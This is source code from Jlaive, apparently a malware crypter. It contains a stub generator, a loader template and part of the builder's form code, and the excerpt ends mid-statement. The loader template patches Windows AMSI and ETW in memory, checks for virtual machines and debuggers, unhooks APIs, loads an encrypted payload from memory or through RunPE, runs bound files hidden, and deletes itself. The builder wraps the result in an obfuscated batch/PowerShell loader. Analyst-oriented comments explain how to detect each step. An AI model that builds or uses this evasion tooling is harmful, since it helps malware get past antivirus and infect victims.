System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /Jlaive/CodeGen/StubGen.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Reflection; 4 | using System.Text; 5 | 6 | using static Jlaive.Utils; 7 | 8 | namespace Jlaive 9 | { 10 | public class StubGen 11 | { 12 | /* Returns the PowerShell loader as a single line of text. Loads the embedded template Jlaive.Resources.AESStub.ps1 when mode is AES and Jlaive.Resources.XORStub.ps1 otherwise; substitutes DECRYPTION_KEY (and DECRYPTION_IV for AES) with the Base64 of key and iv; renames the template's placeholder identifiers ending in _var to 5-character RandomString names; removes every Environment.NewLine. iv is unused in the XOR branch. For analysts: the key and IV are embedded in the generated script as Base64 literals, and both templates read the payload from the last line of the batch file, so a captured script holds what is needed to decode its payload offline; the variable names differ per build and are not usable as indicators. */ public static string CreatePS(byte[] key, byte[] iv, EncryptionMode mode, Random rng) 13 | { 14 | string contents_var = RandomString(5, rng); 15 | string lastline_var = RandomString(5, rng); 16 | string payload_var = RandomString(5, rng); 17 | string key_var = RandomString(5, rng); 18 | string aes_var = RandomString(5, rng); 19 | string decryptor_var = RandomString(5, rng); 20 | string msi_var = RandomString(5, rng); 21 | string mso_var = RandomString(5, rng); 22 | string gs_var = RandomString(5, rng); 23 | 24 | if (mode == EncryptionMode.AES) 25 | { 26 | string stubcode = GetEmbeddedString("Jlaive.Resources.AESStub.ps1"); 27 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key)); 28 | stubcode = stubcode.Replace("DECRYPTION_IV", Convert.ToBase64String(iv)); 29 | stubcode = stubcode.Replace("contents_var", contents_var); 30 | stubcode = stubcode.Replace("lastline_var", lastline_var); 31 | stubcode = stubcode.Replace("payload_var", payload_var); 32 | stubcode = stubcode.Replace("aes_var", aes_var); 33 | stubcode = stubcode.Replace("decryptor_var", decryptor_var); 34 | stubcode = stubcode.Replace("msi_var", msi_var); 35 | stubcode = stubcode.Replace("mso_var", mso_var); 36 | stubcode = stubcode.Replace("gs_var", gs_var); 37 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty); 38 | return stubcode; 39 | } 40 | else 41 
| { 42 | string stubcode = GetEmbeddedString("Jlaive.Resources.XORStub.ps1"); 43 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key)); 44 | stubcode = stubcode.Replace("contents_var", contents_var); 45 | stubcode = stubcode.Replace("lastline_var", lastline_var); 46 | stubcode = stubcode.Replace("payload_var", payload_var); 47 | stubcode = stubcode.Replace("key_var", key_var); 48 | stubcode = stubcode.Replace("msi_var", msi_var); 49 | stubcode = stubcode.Replace("mso_var", mso_var); 50 | stubcode = stubcode.Replace("gs_var", gs_var); 51 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty); 52 | return stubcode; 53 | } 54 | } 55 | 56 | /* Returns C# source for the stub: optional "#define" lines followed by the embedded template Jlaive.Resources.Stub.cs (not part of this listing) with its placeholders substituted. antidebug, antivm and native emit ANTI_DEBUG, ANTI_VM and USE_RUNPE; mode emits XOR_ENCRYPT or AES_ENCRYPT. Eight identifiers are replaced by 20-character RandomString names. The placeholders ending in _str receive the Base64 of Utils.Encrypt(mode, literal, key, iv) for a fixed list of literals - the API names "AmsiScanBuffer", "EtwEventWrite", "CheckRemoteDebuggerPresent" and "IsDebuggerPresent", the resource, type and method names for runpe.dll and apiunhooker.dll, "payload.exe", and a cmd.exe argument string - while key_str and iv_str receive the Base64 key and IV themselves. For defenders: these names therefore do not occur as plaintext in the generated source, so string signatures on them will not match, but because the key and IV sit next to the ciphertexts each of them can be decrypted from a sample. How the template uses the decrypted names is not visible here. */ public static string CreateCS(byte[] key, byte[] iv, EncryptionMode mode, bool antidebug, bool antivm, bool native, Random rng) 57 | { 58 | string namespacename = RandomString(20, rng); 59 | string classname = RandomString(20, rng); 60 | string aesfunction = RandomString(20, rng); 61 | string uncompressfunction = RandomString(20, rng); 62 | string gerfunction = RandomString(20, rng); 63 | string virtualprotect = RandomString(20, rng); 64 | string checkremotedebugger = RandomString(20, rng); 65 | string isdebuggerpresent = RandomString(20, rng); 66 | 67 | string amsiscanbuffer_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("AmsiScanBuffer"), key, iv)); 68 | string etweventwrite_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("EtwEventWrite"), key, iv)); 69 | 70 | string checkremotedebugger_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("CheckRemoteDebuggerPresent"), key, iv)); 71 | string isdebuggerpresent_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("IsDebuggerPresent"), key, iv)); 72 | string payloadtxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("payload.exe"), key, iv)); 73 | string runpedlltxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.dll"), key, iv)); 74 | string 
runpeclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.RunPE"), key, iv)); 75 | string runpefunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("ExecutePE"), key, iv)); 76 | string unhookertxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("apiunhooker.dll"), key, iv)); 77 | string unhookerclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("apiunhooker.APIUnhooker"), key, iv)); 78 | string unhookerfunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("Start"), key, iv)); 79 | string cmdcommand_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("/c choice /c y /n /d y /t 1 & attrib -s -h \""), key, iv)); 80 | string key_str = Convert.ToBase64String(key); 81 | string iv_str = Convert.ToBase64String(iv); 82 | 83 | string stub = string.Empty; 84 | string stubcode = GetEmbeddedString("Jlaive.Resources.Stub.cs"); 85 | 86 | /* the #define lines select which conditional sections of the template are compiled */ if (antidebug) stub += "#define ANTI_DEBUG\n"; 87 | if (antivm) stub += "#define ANTI_VM\n"; 88 | if (native) stub += "#define USE_RUNPE\n"; 89 | if (mode == EncryptionMode.XOR) stub += "#define XOR_ENCRYPT\n"; 90 | else stub += "#define AES_ENCRYPT\n"; 91 | stubcode = stubcode.Replace("namespace_name", namespacename); 92 | stubcode = stubcode.Replace("class_name", classname); 93 | stubcode = stubcode.Replace("aesfunction_name", aesfunction); 94 | stubcode = stubcode.Replace("uncompressfunction_name", uncompressfunction); 95 | stubcode = stubcode.Replace("getembeddedresourcefunction_name", gerfunction); 96 | stubcode = stubcode.Replace("virtualprotect_name", virtualprotect); 97 | stubcode = stubcode.Replace("checkremotedebugger_name", checkremotedebugger); 98 | stubcode = stubcode.Replace("isdebuggerpresent_name", isdebuggerpresent); 99 | stubcode = stubcode.Replace("amsiscanbuffer_str", amsiscanbuffer_str); 100 | stubcode = stubcode.Replace("etweventwrite_str", etweventwrite_str); 101 | stubcode = 
stubcode.Replace("checkremotedebugger_str", checkremotedebugger_str); 102 | stubcode = stubcode.Replace("isdebuggerpresent_str", isdebuggerpresent_str); 103 | stubcode = stubcode.Replace("payloadtxt_str", payloadtxt_str); 104 | stubcode = stubcode.Replace("runpedlltxt_str", runpedlltxt_str); 105 | stubcode = stubcode.Replace("runpeclass_str", runpeclass_str); 106 | stubcode = stubcode.Replace("runpefunction_str", runpefunction_str); 107 | stubcode = stubcode.Replace("unhookertxt_str", unhookertxt_str); 108 | stubcode = stubcode.Replace("unhookerclass_str", unhookerclass_str); 109 | stubcode = stubcode.Replace("unhookerfunction_str", unhookerfunction_str); 110 | stubcode = stubcode.Replace("cmdcommand_str", cmdcommand_str); 111 | stubcode = stubcode.Replace("key_str", key_str); 112 | stubcode = stubcode.Replace("iv_str", iv_str); 113 | stub += stubcode; 114 | 115 | return stub; 116 | } 117 | } 118 | } -------------------------------------------------------------------------------- /Jlaive/FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 23 | 24 | 25 | 26 | 27 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 28 | 29 | 30 | 31 | 32 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 
38 | 39 | 40 | 41 | 42 | The order of preloaded assemblies, delimited with line breaks. 43 | 44 | 45 | 46 | 47 | 48 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 49 | 50 | 51 | 52 | 53 | Controls if .pdbs for reference assemblies are also embedded. 54 | 55 | 56 | 57 | 58 | Controls if runtime assemblies are also embedded. 59 | 60 | 61 | 62 | 63 | Controls whether the runtime assemblies are embedded with their full path or only with their assembly name. 64 | 65 | 66 | 67 | 68 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 69 | 70 | 71 | 72 | 73 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 74 | 75 | 76 | 77 | 78 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 79 | 80 | 81 | 82 | 83 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 84 | 85 | 86 | 87 | 88 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 89 | 90 | 91 | 92 | 93 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 94 | 95 | 96 | 97 | 98 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 99 | 100 | 101 | 102 | 103 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |. 104 | 105 | 106 | 107 | 108 | A list of unmanaged 32 bit assembly names to include, delimited with |. 
109 | 110 | 111 | 112 | 113 | A list of unmanaged 64 bit assembly names to include, delimited with |. 114 | 115 | 116 | 117 | 118 | The order of preloaded assemblies, delimited with |. 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 127 | 128 | 129 | 130 | 131 | A comma-separated list of error codes that can be safely ignored in assembly verification. 132 | 133 | 134 | 135 | 136 | 'false' to turn off automatic generation of the XML Schema file. 137 | 138 | 139 | 140 | 141 | -------------------------------------------------------------------------------- /Jlaive/Resources/Stub.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.IO.Compression; 5 | using System.Text; 6 | using System.Reflection; 7 | using System.Runtime.InteropServices; 8 | using System.Security.Cryptography; 9 | using System.Security.Principal; 10 | using System.Management; 11 | using System.Threading; 12 | using Microsoft.Win32; 13 | /* Loader stub template. Identifiers ending in _name and string literals ending in _str are placeholders that StubGen.CreateCS replaces textually before the stub is compiled; the ANTI_DEBUG / ANTI_VM / USE_RUNPE / AES_ENCRYPT / XOR_ENCRYPT symbols are prepended by the same generator. */ 14 | namespace namespace_name 15 | { 16 | internal class class_name 17 | { 18 | [DllImport("kernel32.dll")] 19 | static extern IntPtr LoadLibrary(string lpFileName); 20 | 21 | [DllImport("kernel32.dll")] 22 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 23 | 24 | delegate bool virtualprotect_name(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | #if ANTI_DEBUG 26 | delegate bool checkremotedebugger_name(IntPtr hProcess, ref bool isDebuggerPresent); 27 | delegate bool isdebuggerpresent_name(); 28 | #endif 29 | /* Entry point. Observable sequence, in order: (1) sets Hidden|System attributes on its own image file; (2) under ANTI_VM, queries WMI Win32_ComputerSystem and exits with code 1 on Microsoft "VIRTUAL", VMware or VirtualBox manufacturer/model strings; (3) under ANTI_DEBUG, exits with code 1 when any of three debugger checks reports true; (4) overwrites the start of AmsiScanBuffer (amsi.dll) and EtwEventWrite (ntdll.dll) inside its own process; (5) loads the embedded unhooker assembly from memory and invokes it; (6) writes every remaining embedded resource to the current directory, runs it and deletes it after exit; (7) decrypts the payload and runs it from memory; (8) starts a hidden cmd.exe that removes the attributes and deletes the stub file. Each step is a separate detection opportunity (file attribute change, WMI query, in-memory modification of system DLL code, reflective Assembly.Load, child cmd.exe with choice/attrib/del). */ 30 | static void Main(string[] args) 31 | { 32 | string currentfilename = Process.GetCurrentProcess().MainModule.FileName; 33 | File.SetAttributes(currentfilename, FileAttributes.Hidden | FileAttributes.System); 34 | #if ANTI_VM 35 | ManagementObjectSearcher searcher = new
ManagementObjectSearcher("Select * from Win32_ComputerSystem"); 36 | ManagementObjectCollection instances = searcher.Get(); 37 | foreach (ManagementBaseObject inst in instances) 38 | { 39 | string manufacturer = inst["Manufacturer"].ToString().ToLower(); 40 | if ((manufacturer == "microsoft corporation" && inst["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || manufacturer.Contains("vmware") || inst["Model"].ToString() == "VirtualBox") 41 | { 42 | Environment.Exit(1); 43 | } 44 | } 45 | searcher.Dispose(); 46 | #endif 47 | /* Module and export names are assembled from single-character literals or decrypted at run time, so they do not appear as contiguous strings in the compiled stub. */ 48 | IntPtr kmodule = LoadLibrary("k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + "." + "d" + "l" + "l"); 49 | 50 | #if ANTI_DEBUG 51 | IntPtr crdpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("checkremotedebugger_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 52 | IntPtr idpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("isdebuggerpresent_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 53 | checkremotedebugger_name CheckRemoteDebuggerPresent = (checkremotedebugger_name)Marshal.GetDelegateForFunctionPointer(crdpaddr, typeof(checkremotedebugger_name)); 54 | isdebuggerpresent_name IsDebuggerPresent = (isdebuggerpresent_name)Marshal.GetDelegateForFunctionPointer(idpaddr, typeof(isdebuggerpresent_name)); 55 | bool remotedebug = false; 56 | CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedebug); 57 | if (Debugger.IsAttached || remotedebug || IsDebuggerPresent()) Environment.Exit(1); 58 | #endif 59 | 60 | IntPtr vpaddr = GetProcAddress(kmodule, "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t"); 61 | virtualprotect_name VirtualProtect = (virtualprotect_name)Marshal.GetDelegateForFunctionPointer(vpaddr, typeof(virtualprotect_name)); /* In-process patching of the AMSI scan and ETW write exports. The 64-bit AMSI bytes encode "mov eax, 0x80070057; ret" and the 64-bit ETW byte is a bare "ret" (the 32-bit variants use "ret 0x18" / "ret 0x14"), so both functions return immediately. Each write is bracketed by VirtualProtect with protection 0x40 and a restore of the previous value. Defender note: the change is visible by comparing the in-memory bytes at these exports with the on-disk DLL image, and the loss of script-scan and ETW events from a process is itself a signal. */ 62 | byte[] patch; 63 | uint old; 64 | 65 | IntPtr amsimodule = LoadLibrary("a" +
"m" + "s" + "i" + "." + "d" + "l" + "l"); 66 | IntPtr asbaddr = GetProcAddress(amsimodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("amsiscanbuffer_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 67 | if (IntPtr.Size == 8) patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; 68 | else patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; 69 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, 0x40, out old); 70 | Marshal.Copy(patch, 0, asbaddr, patch.Length); 71 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, old, out old); 72 | 73 | IntPtr ntdll = LoadLibrary("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"); 74 | IntPtr etwaddr = GetProcAddress(ntdll, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("etweventwrite_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 75 | if (IntPtr.Size == 8) patch = new byte[] { 0xC3 }; 76 | else patch = new byte[] { 0xC2, 0x14, 0x00 }; 77 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, 0x40, out old); 78 | Marshal.Copy(patch, 0, etwaddr, patch.Length); 79 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, old, out old); 80 | /* Resource names of the three internal components; they are decrypted here and used below to skip these entries when bound files are written out. */ 81 | string payloadstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("payloadtxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 82 | string runpestr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpedlltxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 83 | string unhookerstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookertxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 84 | 85 | Assembly unhookerasm = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(unhookerstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 86 | string
unhookerclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookerclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 87 | string unhookerfunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookerfunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 88 | unhookerasm.GetType(unhookerclass).GetMethod(unhookerfunction).Invoke(null, null); 89 | /* Bound files: every other manifest resource is written unencrypted under its resource name (a relative path, so the current directory), marked Hidden|System, started, and removed once the started process exits. These on-disk files exist for the lifetime of the bound process. */ 90 | Assembly asm = Assembly.GetExecutingAssembly(); 91 | foreach (string name in asm.GetManifestResourceNames()) 92 | { 93 | if (name == payloadstr || name == runpestr || name == unhookerstr) continue; 94 | File.WriteAllBytes(name, getembeddedresourcefunction_name(name)); 95 | File.SetAttributes(name, FileAttributes.Hidden | FileAttributes.System); 96 | new Thread(() => 97 | { 98 | Process.Start(name).WaitForExit(); 99 | File.SetAttributes(name, FileAttributes.Normal); 100 | File.Delete(name); 101 | }).Start(); 102 | } 103 | /* The payload is decrypted and decompressed in memory only; args[0], when present, is split on spaces into the payload's argument array (a missing args[0] is swallowed and leaves it empty). */ 104 | byte[] payload = uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(payloadstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 105 | string[] targs = new string[] { }; 106 | try 107 | { 108 | targs = args[0].Split(' '); 109 | } 110 | catch { } 111 | 112 | #if USE_RUNPE 113 | Assembly runpe = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(runpestr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 114 | string runpeclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpeclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 115 | string runpefunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpefunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 116 | runpe.GetType(runpeclass).GetMethod(runpefunction).Invoke(null, new object[] 117 | { 118
| Path.ChangeExtension(currentfilename, null), 119 | payload, 120 | targs 121 | }); 122 | #else 123 | MethodInfo entry = Assembly.Load(payload).EntryPoint; 124 | try { entry.Invoke(null, new object[] { targs }); } 125 | catch { entry.Invoke(null, null); } 126 | #endif /* Self-removal: a hidden cmd.exe is started with the decrypted "/c choice /c y /n /d y /t 1 & attrib -s -h" prefix followed by the stub path and a del of the same path. A cmd.exe child whose command line combines choice, attrib -s -h and del on its parent's image is a compact process-creation detection. */ 127 | string cmdstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("cmdcommand_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 128 | Process.Start(new ProcessStartInfo() 129 | { 130 | Arguments = cmdstr + currentfilename + "\" & del \"" + currentfilename + "\"", 131 | WindowStyle = ProcessWindowStyle.Hidden, 132 | CreateNoWindow = true, 133 | FileName = "cmd.exe" 134 | }); 135 | } 136 | /* Decrypts input. With AES_ENCRYPT: AES in CBC mode with PKCS7 padding using key and iv, returning a new array. With XOR_ENCRYPT: XORs input in place against the repeating key (iv is not used) and returns the same array. */ 137 | static byte[] aesfunction_name(byte[] input, byte[] key, byte[] iv) 138 | { 139 | #if AES_ENCRYPT 140 | AesManaged aes = new AesManaged(); 141 | aes.Mode = CipherMode.CBC; 142 | aes.Padding = PaddingMode.PKCS7; 143 | ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); 144 | byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); 145 | decryptor.Dispose(); 146 | aes.Dispose(); 147 | return decrypted; 148 | #endif 149 | #if XOR_ENCRYPT 150 | for (int i = 0; i < input.Length; i++) 151 | { 152 | input[i] = (byte)(input[i] ^ key[i % key.Length]); 153 | } 154 | return input; 155 | #endif 156 | } 157 | /* GZip-decompresses bytes and returns the result as a new array. */ 158 | static byte[] uncompressfunction_name(byte[] bytes) 159 | { 160 | MemoryStream msi = new MemoryStream(bytes); 161 | MemoryStream mso = new MemoryStream(); 162 | GZipStream gs = new GZipStream(msi, CompressionMode.Decompress); 163 | gs.CopyTo(mso); 164 | gs.Dispose(); 165 | mso.Dispose(); 166 | msi.Dispose(); 167 | return mso.ToArray(); 168 | } 169 | /* Returns the raw bytes of the manifest resource called name in the executing assembly. */ 170 | static byte[] getembeddedresourcefunction_name(string name) 171 | { 172 | Assembly asm = Assembly.GetExecutingAssembly(); 173 | MemoryStream ms = new MemoryStream(); 174 | Stream stream = asm.GetManifestResourceStream(name); 175 | stream.CopyTo(ms); 176 | stream.Dispose(); 177 | byte[]
ret = ms.ToArray(); 178 | ms.Dispose(); 179 | return ret; 180 | } 181 | } 182 | } -------------------------------------------------------------------------------- /Jlaive/Form1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.CodeDom.Compiler; 3 | using System.Collections.Generic; 4 | using System.Diagnostics; 5 | using System.IO; 6 | using System.Net; 7 | using System.Security.Cryptography; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows.Forms; 11 | using Microsoft.CSharp; 12 | 13 | using static Jlaive.Utils; 14 | 15 | namespace Jlaive 16 | { 17 | public partial class Form1 : Form 18 | { 19 | public Form1() 20 | { 21 | InitializeComponent(); 22 | } 23 | /* Restores the builder options saved by a previous session (when Settings.Load returns an object), starts the version check on a background task and fills the key/IV text boxes. */ 24 | private void Form1_Load(object sender, EventArgs e) 25 | { 26 | SettingsObject obj = Settings.Load(); 27 | if (obj != null) 28 | { 29 | textBox1.Text = obj.inputFile; 30 | antiDebug.Checked = obj.antiDebug; 31 | antiVM.Checked = obj.antiVM; 32 | selfDelete.Checked = obj.selfDelete; 33 | hidden.Checked = obj.hidden; 34 | aesEncryption.Checked = obj.aes; 35 | xorEncryption.Checked = obj.xor; 36 | listBox1.Items.AddRange(obj.bindedFiles); 37 | } 38 | Task.Factory.StartNew(CheckVersion); // Comment out this line to disable version checking 39 | UpdateKeys(sender, e); 40 | } 41 | /* Copies the current option values and the bound-file list into a SettingsObject, saves it through Settings.Save and terminates the process. */ 42 | private void Form1_FormClosing(object sender, FormClosingEventArgs e) 43 | { 44 | SettingsObject obj = new SettingsObject(); 45 | obj.inputFile = textBox1.Text; 46 | obj.antiDebug = antiDebug.Checked; 47 | obj.antiVM = antiVM.Checked; 48 | obj.selfDelete = selfDelete.Checked; 49 | obj.hidden = hidden.Checked; 50 | obj.aes = aesEncryption.Checked; 51 | obj.xor = xorEncryption.Checked; 52 | List paths = new List(); 53 | foreach (string item in listBox1.Items) paths.Add(item); 54 | obj.bindedFiles = paths.ToArray(); 55 | Settings.Save(obj); 56 | Environment.Exit(0); 57 | } 58 | 59 | private void openButton_Click(object sender,
EventArgs e) 60 | { 61 | OpenFileDialog ofd = new OpenFileDialog(); 62 | ofd.RestoreDirectory = true; 63 | if (ofd.ShowDialog() != DialogResult.OK) return; 64 | textBox1.Text = ofd.FileName; 65 | } 66 | /* Build button: runs the whole build pipeline synchronously. */ 67 | private void buildButton_Click(object sender, EventArgs e) 68 | { 69 | Crypt(); 70 | } 71 | /* The two encryption check boxes are kept mutually exclusive by this handler and the next one. */ 72 | private void aesEncryption_CheckedChanged(object sender, EventArgs e) 73 | { 74 | if (aesEncryption.Checked) xorEncryption.Checked = false; 75 | } 76 | 77 | private void xorEncryption_CheckedChanged(object sender, EventArgs e) 78 | { 79 | if (xorEncryption.Checked) aesEncryption.Checked = false; 80 | } 81 | /* Adds the chosen path to the bound-file list (listBox1); each entry is later embedded into the stub as a resource by Crypt. */ 82 | private void addFile_Click(object sender, EventArgs e) 83 | { 84 | OpenFileDialog ofd = new OpenFileDialog(); 85 | ofd.RestoreDirectory = true; 86 | if (ofd.ShowDialog() != DialogResult.OK) return; 87 | listBox1.Items.Add(ofd.FileName); 88 | } 89 | /* Removes the selected entry from the bound-file list. */ 90 | private void removeFile_Click(object sender, EventArgs e) 91 | { 92 | listBox1.Items.Remove(listBox1.SelectedItem); 93 | } 94 | /* Build pipeline. Reads the four Base64 key/IV boxes, rejects XOR mode, a missing input path and any extension other than ".exe", then: reads the input; runs Patcher.Fix on it when IsAssembly reports a .NET assembly; compresses and encrypts it with the stub key/IV; generates stub source with StubGen.CreateCS; compiles that source with CSharpCodeProvider, embedding payload.exe, apiunhooker.dll, runpe.dll (native input only) and every bound file as resources; compresses and encrypts the compiled stub with the outer key/IV; and writes the input path with a "bat" extension containing FileGen.CreateBat output followed by the Base64 stub, as ASCII. Analyst note: the result is two nested layers (batch text carrying an encrypted stub, stub carrying an encrypted payload), each with its own key/IV pair. Forensic note: during a build, payload.exe, apiunhooker.dll and runpe.dll are written as relative paths (current working directory) and a temp file from Path.GetTempFileName receives the compiled stub. */ 95 | private void Crypt() 96 | { 97 | buildButton.Enabled = false; 98 | tabControl1.SelectedTab = tabControl1.TabPages["outputPage"]; 99 | listBox2.Items.Clear(); 100 | 101 | Random rng = new Random(); 102 | string _input = textBox1.Text; 103 | byte[] _key = Convert.FromBase64String(key1.Text); 104 | byte[] _iv = Convert.FromBase64String(iv1.Text); 105 | byte[] _stubkey = Convert.FromBase64String(key2.Text); 106 | byte[] _stubiv = Convert.FromBase64String(iv6.Text); 107 | EncryptionMode mode = xorEncryption.Checked ?
EncryptionMode.XOR : EncryptionMode.AES; 108 | if (mode == EncryptionMode.XOR) 109 | { 110 | MessageBox.Show("XOR encryption is currently not available due to bugs.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 111 | buildButton.Enabled = true; 112 | return; 113 | } 114 | 115 | if (!File.Exists(_input)) 116 | { 117 | MessageBox.Show("Invalid input path.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 118 | buildButton.Enabled = true; 119 | return; 120 | } 121 | if (Path.GetExtension(_input) != ".exe") 122 | { 123 | MessageBox.Show("Invalid input file.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 124 | buildButton.Enabled = true; 125 | return; 126 | } 127 | 128 | Console.ForegroundColor = ConsoleColor.Gray; 129 | byte[] pbytes = File.ReadAllBytes(_input); 130 | bool isnetasm = IsAssembly(_input); 131 | 132 | if (isnetasm) 133 | { 134 | listBox2.Items.Add("Patching assembly..."); 135 | pbytes = Patcher.Fix(pbytes); 136 | } 137 | 138 | listBox2.Items.Add("Encrypting payload..."); 139 | byte[] payload_enc = Encrypt(mode, Compress(pbytes), _stubkey, _stubiv); 140 | /* native is passed as !isnetasm: the RunPE path is compiled in only for input that is not a .NET assembly. */ 141 | listBox2.Items.Add("Creating stub..."); 142 | string stub = StubGen.CreateCS(_stubkey, _stubiv, mode, antiDebug.Checked, antiVM.Checked, !isnetasm, rng); 143 | 144 | listBox2.Items.Add("Building stub..."); 145 | string tempfile = Path.GetTempFileName(); 146 | File.WriteAllBytes("payload.exe", payload_enc); 147 | byte[] unhookerdll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Jlaive.Resources.apiunhooker.dll")), _stubkey, _stubiv); 148 | File.WriteAllBytes("apiunhooker.dll", unhookerdll_enc); 149 | if (!isnetasm) 150 | { 151 | byte[] runpedll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Jlaive.Resources.runpe.dll")), _stubkey, _stubiv); 152 | File.WriteAllBytes("runpe.dll", runpedll_enc); 153 | } 154 | CSharpCodeProvider csc = new CSharpCodeProvider(); 155 | CompilerParameters parameters = new CompilerParameters(new[] { "mscorlib.dll", "System.Core.dll",
